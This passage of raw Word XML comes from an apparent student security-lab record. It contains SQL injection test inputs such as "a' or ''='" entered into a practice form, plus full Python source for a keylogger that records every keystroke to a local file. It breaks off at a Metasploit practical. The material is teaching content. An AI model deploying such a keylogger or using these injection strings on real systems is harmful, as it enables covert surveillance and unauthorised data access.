        <w:spacing w:before="197"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on SQL injection option in left.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147494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161876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5123490" cy="3561683"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="557" name="image2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27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490" cy="3561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80" w:right="1040" w:bottom="1280" w:left="1220" w:header="0" w:footer="85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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>9 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147596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4971798" cy="3503295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="559" name="image2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27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798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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="148"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "a' or ''='" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147699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161939</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4890415" cy="3530917"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="561" name="image2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28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415" cy="3530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80" w:right="1040" w:bottom="1240" w:left="1220" w:header="0" w:footer="85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296621" w:rsidP="00D569E9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1=1" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147801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156485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5530401" cy="2861214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="563" name="image2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28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401" cy="2861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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="168"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>12 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Write "1*" in text box and click on submit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25147904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162670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5530401" cy="2861214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="565" name="image2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28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401" cy="2861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80" w:right="1040" w:bottom="1280" w:left="1220" w:header="0" w:footer="85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296621" w:rsidP="00D569E9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim: -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code: -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import Key, Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no name it gets into an empty string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a basic logging function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.basicConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filename=(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+"key_log.txt"), level=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.DEBUG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, format='%(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)s:%(message)s:')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is from the library</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logging.info(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(key))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> says, listener is on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Listener(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Output: -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3" w:rsidP="00A735D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3800475" cy="2871912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556" cy="287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5D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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A735D3" w:rsidRPr="00D4195F" w:rsidRDefault="00A735D3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D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C94E44" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C94E44" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
